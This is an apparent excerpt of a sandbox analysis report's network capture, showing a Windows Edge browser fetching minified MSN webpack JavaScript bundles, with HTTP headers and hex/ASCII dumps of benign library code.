                                                                                                                                                                                                                                                                                                                            report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                                                            nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                                                            Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                            Akamai-GRN: 0.9904d217.1736062766.8da91279
                                                                                                                                                                                                                                                                                                                            Vary: Origin
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC15146INData Raw: 30 30 30 30 36 30 30 30 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 76 65 6e 64 6f 72 73 2e 62 34 37 34 32 30 36 32 65 66 64 64 31 65 33 38 62 66 61 63 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 22 5d 2c 7b 37 33 30 34 30 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 7d 74 2e 65 78 70 6f 72 74 73 3d 65 2c 74 2e 65 78 70 6f 72 74 73 2e 48 74 74 70 73 41 67 65 6e 74 3d 65 7d 2c 31 33 30 31
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00006000/*! For license information please see vendors.b4742062efdd1e38bfac.js.LICENSE.txt */(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks||[]).push([["vendors"],{73040:function(t){function e(){}t.exports=e,t.exports.HttpsAgent=e},1301
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC9442INData Raw: 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 28 5c 5c 64 7b 34 7d 7c 5b 2b 2d 5d 5c 5c 64 7b 22 2b 28 34 2b 65 29 2b 22 7d 29 7c 28 5c 5c 64 7b 32 7d 7c 5b 2b 2d 5d 5c 5c 64 7b 22 2b 28 32 2b 65 29 2b 22 7d 29 24 29 22 29 2c 72 3d 74 2e 6d 61 74 63 68 28 6e 29 3b 69 66 28 21 72 29 72 65 74 75 72 6e 7b 79 65 61 72 3a 4e 61 4e 2c 72 65 73 74 44 61 74 65 53 74 72 69 6e 67 3a 22 22 7d 3b 76 61 72 20 69 3d 72 5b 31 5d 3f 70 61 72 73 65 49 6e 74 28 72 5b 31 5d 29 3a 6e 75 6c 6c 2c 6f 3d 72 5b 32 5d 3f 70 61 72 73 65 49 6e 74 28 72 5b 32 5d 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 7b 79 65 61 72 3a 6e 75 6c 6c 3d 3d 3d 6f 3f 69 3a 31 30 30 2a 6f 2c 72 65 73 74 44 61 74 65 53 74 72 69 6e 67 3a 74 2e 73 6c 69 63 65 28 28
                                                                                                                                                                                                                                                                                                                            Data Ascii: on(t,e){var n=new RegExp("^(?:(\\d{4}|[+-]\\d{"+(4+e)+"})|(\\d{2}|[+-]\\d{"+(2+e)+"})$)"),r=t.match(n);if(!r)return{year:NaN,restDateString:""};var i=r[1]?parseInt(r[1]):null,o=r[2]?parseInt(r[2]):null;return{year:null===o?i:100*o,restDateString:t.slice((
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC16384INData Raw: 30 30 30 30 35 44 30 32 0d 0a 70 2d 70 61 74 68 22 2c 22 63 6c 69 70 2d 72 75 6c 65 22 2c 22 63 6f 6c 6f 72 22 2c 22 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 22 2c 22 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 22 2c 22 63 6f 6c 6f 72 2d 70 72 6f 66 69 6c 65 22 2c 22 63 6f 6c 6f 72 2d 72 65 6e 64 65 72 69 6e 67 22 2c 22 63 78 22 2c 22 63 79 22 2c 22 64 22 2c 22 64 78 22 2c 22 64 79 22 2c 22 64 69 66 66 75 73 65 63 6f 6e 73 74 61 6e 74 22 2c 22 64 69 72 65 63 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 22 2c 22 64 69 76 69 73 6f 72 22 2c 22 64 75 72 22 2c 22 65 64 67 65 6d 6f 64 65 22 2c 22 65 6c 65 76 61 74 69 6f 6e 22 2c 22 65 6e 64 22 2c 22 66 69 6c 6c 22 2c 22 66 69 6c 6c 2d 6f 70 61 63 69 74 79 22 2c
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00005D02p-path","clip-rule","color","color-interpolation","color-interpolation-filters","color-profile","color-rendering","cx","cy","d","dx","dy","diffuseconstant","direction","display","divisor","dur","edgemode","elevation","end","fill","fill-opacity",
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC7438INData Raw: 65 72 75 70 22 2c 68 29 2c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 6f 75 63 68 6d 6f 76 65 22 2c 68 29 2c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 6f 75 63 68 73 74 61 72 74 22 2c 68 29 2c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 6f 75 63 68 65 6e 64 22 2c 68 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 29 7b 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 6d 6f 76 65 22 2c 68 29 2c 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 68 29 2c 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69
                                                                                                                                                                                                                                                                                                                            Data Ascii: erup",h),document.addEventListener("touchmove",h),document.addEventListener("touchstart",h),document.addEventListener("touchend",h)}function v(){document.removeEventListener("mousemove",h),document.removeEventListener("mousedown",h),document.removeEventLi
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 49 54 3a 22 40 40 72 65 64 75 78 2f 49 4e 49 54 22 2b 69 28 29 2c 52 45 50 4c 41 43 45 3a 22 40 40 72 65 64 75 78 2f 52 45 50 4c 41 43 45 22 2b 69 28 29 2c 50 52 4f 42 45 5f 55 4e 4b 4e 4f 57 4e 5f 41 43 54 49 4f 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 40 40 72 65 64 75 78 2f 50 52 4f 42 45 5f 55 4e 4b 4e 4f 57 4e 5f 41 43 54 49 4f 4e 22 2b 69 28 29 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 75 28 74 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 6e 75 6c 6c 3d 3d 3d 74 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 76 61 72 20 65 3d 74 3b 6e 75 6c 6c 21 3d 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 29 3b 29 65 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00004000IT:"@@redux/INIT"+i(),REPLACE:"@@redux/REPLACE"+i(),PROBE_UNKNOWN_ACTION:function(){return"@@redux/PROBE_UNKNOWN_ACTION"+i()}};function u(t){if("object"!=typeof t||null===t)return!1;for(var e=t;null!==Object.getPrototypeOf(e);)e=Object.getProtot
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC12INData Raw: 49 43 6f 6d 70 6f 6e 65 6e 74 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: IComponent
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 29 2e 72 65 70 6c 61 63 65 28 2f 5b 28 29 5d 2f 67 2c 65 73 63 61 70 65 29 3b 76 61 72 20 75 3d 22 22 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 6f 29 6f 5b 63 5d 26 26 28 75 2b 3d 22 3b 20 22 2b 63 2c 21 30 21 3d 3d 6f 5b 63 5d 26 26 28 75 2b 3d 22 3d 22 2b 6f 5b 63 5d 2e 73 70 6c 69 74 28 22 3b 22 29 5b 30 5d 29 29 3b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 74 2b 22 3d 22 2b 65 2e 77 72 69 74 65 28 69 2c 74 29 2b 75 7d 7d 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 7b 73 65 74 3a 69 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 21 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00004000).replace(/[()]/g,escape);var u="";for(var c in o)o[c]&&(u+="; "+c,!0!==o[c]&&(u+="="+o[c].split(";")[0]));return document.cookie=t+"="+e.write(i,t)+u}}return Object.create({set:i,get:function(t){if("undefined"!=typeof document&&(!arguments.leng
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC12INData Raw: 37 32 29 2c 41 3d 6e 28 38 35 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: 72),A=n(85
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 38 38 39 29 3b 76 61 72 20 45 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 30 2c 77 2e 5a 29 28 74 2c 28 30 2c 41 2e 5a 29 28 74 29 29 7d 3b 76 61 72 20 6a 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 72 2c 69 2c 6f 2c 63 29 7b 76 61 72 20 77 3d 62 28 74 2c 6e 29 2c 41 3d 62 28 65 2c 6e 29 2c 6a 3d 63 2e 67 65 74 28 41 29 3b 69 66 28 6a 29 75 28 74 2c 6e 2c 6a 29 3b 65 6c 73 65 7b 76 61 72 20 4f 3d 6f 3f 6f 28 77 2c 41 2c 6e 2b 22 22 2c 74 2c 65 2c 63 29 3a 76 6f 69 64 20 30 2c 54 3d 76 6f 69 64 20 30 3d 3d 3d 4f 3b 69 66 28 54 29 7b 76 61 72 20 78 3d 28 30 2c 70 2e 5a 29 28 41 29 2c 4e 3d 21 78 26 26 28 30 2c 68 2e 5a 29 28 41 29 2c 53 3d 21 78 26 26 21 4e 26 26 28 30 2c 5a 2e 5a 29 28 41 29 3b 4f 3d 41 2c
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00004000889);var E=function(t){return(0,w.Z)(t,(0,A.Z)(t))};var j=function(t,e,n,r,i,o,c){var w=b(t,n),A=b(e,n),j=c.get(A);if(j)u(t,n,j);else{var O=o?o(w,A,n+"",t,e,c):void 0,T=void 0===O;if(T){var x=(0,p.Z)(A),N=!x&&(0,h.Z)(A),S=!x&&!N&&(0,Z.Z)(A);O=A,
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC12INData Raw: 72 20 6e 3d 46 75 6e 63 74 69 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: r n=Functi


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                            9192.168.2.64987123.209.72.74437232C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC629OUTGET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                            Host: assets.msn.com
                                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC1238INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                            Content-MD5: uNgSH4TlVfgPvcJyj5sBtQ==
                                                                                                                                                                                                                                                                                                                            Last-Modified: Sat, 21 Dec 2024 00:40:16 GMT
                                                                                                                                                                                                                                                                                                                            ETag: 0x8DD215809D888F7
                                                                                                                                                                                                                                                                                                                            Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                            x-ms-request-id: d43c0189-901e-0074-788b-576eef000000
                                                                                                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 07:39:26 GMT
                                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                                            Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                            Akamai-Request-BC: [a=23.210.4.135,b=2686428991,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                                                                            Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                                                            Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                                            Akamai-Server-IP: 23.210.4.135
                                                                                                                                                                                                                                                                                                                            Akamai-Request-ID: a01fa73f
                                                                                                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                            report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                                                            nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                                                            Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                            Akamai-GRN: 0.8704d217.1736062766.a01fa73f
                                                                                                                                                                                                                                                                                                                            Vary: Origin
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC15146INData Raw: 30 30 30 30 36 30 30 30 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 6d 69 63 72 6f 73 6f 66 74 2e 37 66 63 33 31 30 39 37 36 39 33 39 30 65 30 66 37 39 31 32 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 6d 69 63 72 6f 73 6f 66 74 22 5d 2c 7b 36 33 31 36 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 65 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 7d 7d 29 3b 76
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00006000/*! For license information please see microsoft.7fc3109769390e0f7912.js.LICENSE.txt */(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks||[]).push([["microsoft"],{63165:function(t,e,n){"use strict";n.d(e,{Z:function(){return A}});v
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC9442INData Raw: 2c 72 2e 62 24 2c 6f 2e 48 44 2c 6f 2e 68 6a 2c 6f 2e 6a 6e 2c 6f 2e 6d 66 2c 6f 2e 6b 4a 2c 6f 2e 4b 6e 2c 6f 2e 6e 64 2c 72 2e 4d 46 2c 6f 2e 59 36 2c 72 2e 63 70 2c 73 2e 70 37 2c 73 2e 55 59 2c 6f 2e 6c 5f 2c 6c 2e 63 39 2c 6c 2e 49 62 2c 6f 2e 49 64 2c 6f 2e 72 57 2c 6f 2e 59 6d 2c 6f 2e 6f 38 2c 6f 2e 6c 65 2c 6f 2e 6e 72 2c 6f 2e 6d 66 2c 6f 2e 4b 6e 2c 6f 2e 4a 5f 2c 6f 2e 6b 4a 2c 6f 2e 56 5a 2c 6f 2e 48 44 2c 6f 2e 68 6a 2c 6f 2e 6a 6e 2c 6f 2e 59 36 2c 6f 2e 74 4f 2c 6f 2e 55 41 2c 6f 2e 4d 72 2c 6f 2e 58 7a 2c 6f 2e 6e 64 2c 64 2e 70 75 2c 6f 2e 46 59 2c 6f 2e 6c 5f 2c 6c 2e 49 62 2c 6f 2e 6d 36 2c 72 2e 77 31 2c 61 2e 47 57 2c 61 2e 4a 6a 2c 75 2e 70 5a 2c 75 2e 61 7a 2c 75 2e 5f 6c 2c 75 2e 43 4e 2c 75 2e 46 36 2c 61 2e 44 4f 3b 66 75 6e 63
                                                                                                                                                                                                                                                                                                                            Data Ascii: ,r.b$,o.HD,o.hj,o.jn,o.mf,o.kJ,o.Kn,o.nd,r.MF,o.Y6,r.cp,s.p7,s.UY,o.l_,l.c9,l.Ib,o.Id,o.rW,o.Ym,o.o8,o.le,o.nr,o.mf,o.Kn,o.J_,o.kJ,o.VZ,o.HD,o.hj,o.jn,o.Y6,o.tO,o.UA,o.Mr,o.Xz,o.nd,d.pu,o.FY,o.l_,l.Ib,o.m6,r.w1,a.GW,a.Jj,u.pZ,u.az,u._l,u.CN,u.F6,a.DO;func
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 65 5b 72 2e 4d 57 5d 28 61 29 2c 31 3d 3d 3d 65 3f 74 5b 63 2e 79 73 5d 28 73 29 3a 74 5b 63 2e 63 4c 5d 28 73 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 2c 6e 29 7b 76 61 72 20 69 3d 28 30 2c 6f 2e 6a 29 28 65 7c 7c 7b 7d 29 3b 69 26 26 69 5b 72 2e 6d 63 5d 26 26 69 5b 72 2e 6d 63 5d 28 74 2c 6e 29 7d 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 3d 28 30 2c 61 2e 76 34 29 28 74 2e 6c 6f 67 67 69 6e 67 4c 65 76 65 6c 43 6f 6e 73 6f 6c 65 2c 30 29 2c 6c 3d 28 30 2c 61 2e 76 34 29 28 74 2e 6c 6f 67 67 69 6e 67 4c 65 76 65 6c 54 65 6c 65 6d 65 74 72 79 2c 31 29 2c 68 3d 28 30 2c 61 2e 76 34 29 28 74 2e 6d 61 78 4d 65 73 73 61 67 65 4c 69 6d 69 74 2c 32 35 29 2c 66 3d 28 30 2c 61 2e 76 34 29 28 74 5b 72 2e 46 72 5d 2c 21 31 29
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00006000e[r.MW](a),1===e?t[c.ys](s):t[c.cL](s)}}}function v(t,n){var i=(0,o.j)(e||{});i&&i[r.mc]&&i[r.mc](t,n)}!function(t){n=(0,a.v4)(t.loggingLevelConsole,0),l=(0,a.v4)(t.loggingLevelTelemetry,1),h=(0,a.v4)(t.maxMessageLimit,25),f=(0,a.v4)(t[r.Fr],!1)
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC8204INData Raw: 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6f 2e 5f 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 65 26 26 65 2e 75 6e 6c 6f 61 64 28 61 2c 74 29 2c 21 65 7d 2c 61 5b 69 2e 7a 56 5d 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 6e 75 6c 6c 29 2c 28 30 2c 73 2e 6b 4a 29 28 74 29 26 26 28 74 3d 62 28 74 2c 72 2c 65 2c 6e 29 29 2c 76 28 74 7c 7c 61 5b 69 2e 57 32 5d 28 29 2c 65 2c 6e 29 7d 2c 61 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 65 5b 69 2e 54 43 5d 7c 7c 7b 7d 2c 6f 3d 70 28 74 2c 72 2c 65 2c 6e 29 2e 63 74 78 3b 72 65 74 75 72 6e 20 6f 5b 69 2e 75 4c 5d 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6f 2e 69 74 65 72 61 74 65 28 28 66
                                                                                                                                                                                                                                                                                                                            Data Ascii: unction(t){var e=o._next();return e&&e.unload(a,t),!e},a[i.zV]=function(t,n){return void 0===t&&(t=null),(0,s.kJ)(t)&&(t=b(t,r,e,n)),v(t||a[i.W2](),e,n)},a}function m(t,e,n){var r=e[i.TC]||{},o=p(t,r,e,n).ctx;return o[i.uL]=function(t){return o.iterate((f
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 21 30 2c 6e 3d 21 30 2c 69 3d 21 30 2c 6f 3d 22 75 73 65 2d 63 6f 6c 6c 65 63 74 6f 72 2d 64 65 6c 74 61 22 2c 73 3d 21 31 3b 28 30 2c 72 2e 5a 29 28 74 2c 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 74 2e 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 26 26 28 69 3d 21 31 2c 73 7c 7c 28 65 3d 21 31 29 29 7d 2c 74 2e 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 74
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00004000=function(){function t(){var e=!0,n=!0,i=!0,o="use-collector-delta",s=!1;(0,r.Z)(t,this,(function(t){t.allowRequestSending=function(){return e},t.firstRequestSent=function(){i&&(i=!1,s||(e=!1))},t.shouldAddClockSkewHeaders=function(){return n},t
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC12INData Raw: 69 6f 6e 28 29 7b 44 3d 6e 75 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: ion(){D=nu
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 6c 6c 2c 4b 28 30 3d 3d 3d 4d 3f 33 3a 31 2c 30 2c 31 29 2c 4d 2b 2b 2c 4d 25 3d 32 2c 47 28 29 7d 29 2c 65 29 3a 4d 3d 30 29 7d 66 75 6e 63 74 69 6f 6e 20 58 28 29 7b 6e 3d 6e 75 6c 6c 2c 78 3d 21 31 2c 43 3d 5b 5d 2c 6b 3d 6e 75 6c 6c 2c 53 3d 21 31 2c 24 3d 30 2c 54 3d 35 30 30 2c 4c 3d 30 2c 4f 3d 31 65 34 2c 49 3d 7b 7d 2c 45 3d 70 2c 44 3d 6e 75 6c 6c 2c 52 3d 6e 75 6c 6c 2c 46 3d 30 2c 4d 3d 30 2c 66 3d 6e 75 6c 6c 2c 4e 3d 7b 7d 2c 76 3d 76 6f 69 64 20 30 2c 6d 3d 30 2c 6a 3d 2d 31 2c 62 3d 6e 75 6c 6c 2c 5f 3d 21 30 2c 7a 3d 21 31 2c 55 3d 36 2c 71 3d 32 2c 79 3d 6e 75 6c 6c 2c 77 3d 64 74 28 29 2c 67 3d 6e 65 77 20 63 74 28 35 30 30 2c 32 2c 31 2c 7b 72 65 71 75 65 75 65 3a 6c 74 2c 73 65 6e 64 3a 62 74 2c 73 65 6e
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00004000ll,K(0===M?3:1,0,1),M++,M%=2,G()}),e):M=0)}function X(){n=null,x=!1,C=[],k=null,S=!1,$=0,T=500,L=0,O=1e4,I={},E=p,D=null,R=null,F=0,M=0,f=null,N={},v=void 0,m=0,j=-1,b=null,_=!0,z=!1,U=6,q=2,y=null,w=dt(),g=new ct(500,2,1,{requeue:lt,send:bt,sen
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC12INData Raw: 7b 61 3d 74 7d 7d 29 29 7d 72 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: {a=t}}))}r
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 65 74 75 72 6e 20 74 2e 63 6f 6f 6b 69 65 53 65 70 61 72 61 74 6f 72 3d 22 7c 22 2c 74 2e 75 73 65 72 43 6f 6f 6b 69 65 4e 61 6d 65 3d 22 61 69 5f 75 73 65 72 22 2c 74 2e 5f 73 74 61 74 69 63 49 6e 69 74 3d 76 6f 69 64 28 30 2c 73 2e 6c 5f 29 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6c 6f 63 61 6c 49 64 22 2c 45 74 2c 44 74 29 2c 74 7d 28 29 2c 52 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 65 2e 70 6f 70 53 61 6d 70 6c 65 3d 31 30 30 2c 65 2e 65 76 65 6e 74 46 6c 61 67 73 3d 30 2c 74 2e 68 61 73 68 49 64 65 6e 74 69 66 69 65 72 73 26 26 28 65 2e 65 76 65 6e 74 46 6c 61 67 73 3d 31 30 34 38 35 37 36 7c 65 2e 65 76 65 6e 74 46 6c 61 67 73 29 2c 74 2e 64 72 6f 70 49 64 65 6e 74 69 66 69 65 72 73
                                                                                                                                                                                                                                                                                                                            Data Ascii: 00004000eturn t.cookieSeparator="|",t.userCookieName="ai_user",t._staticInit=void(0,s.l_)(t.prototype,"localId",Et,Dt),t}(),Rt=function(t){var e=this;e.popSample=100,e.eventFlags=0,t.hashIdentifiers&&(e.eventFlags=1048576|e.eventFlags),t.dropIdentifiers
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC12INData Raw: 29 3d 3e 4d 61 74 68 2e 6d 69 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: )=>Math.mi


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                            10192.168.2.64987223.209.72.74437232C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC626OUTGET /bundles/v1/edgeChromium/latest/common.2ab67b7067792da4ff61.js HTTP/1.1
